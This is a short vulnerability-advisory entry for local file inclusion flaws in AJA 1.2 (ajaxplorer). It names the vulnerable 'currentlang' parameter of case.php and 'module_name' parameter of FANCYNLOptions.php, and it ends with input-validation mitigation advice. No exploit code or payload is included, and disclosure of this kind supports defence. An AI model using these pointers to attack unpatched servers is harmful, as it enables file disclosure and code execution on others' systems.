Vendor: AJA 1.2
By: ahmadbady
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 98
Product Name: AJA 1.2
Affected Version From: AJA 1.2
Affected Version To: AJA 1.2
Patch Exists: NO
Related CWE: N/A
CPE: a:ajaxplorer:ajaxplorer:1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
multi local file include
AJA 1.2 is vulnerable to multiple local file inclusion vulnerabilities. They exist because user-supplied input to the 'currentlang' parameter of the 'case.php' script and the 'module_name' parameter of the 'FANCYNLOptions.php' script is insufficiently sanitized. An attacker can exploit these vulnerabilities to include arbitrary local files, resulting in the disclosure of sensitive information and the execution of arbitrary code.
Mitigation:
Use input validation to ensure that user-supplied input, including the 'currentlang' and 'module_name' parameters, is properly sanitized before it is used.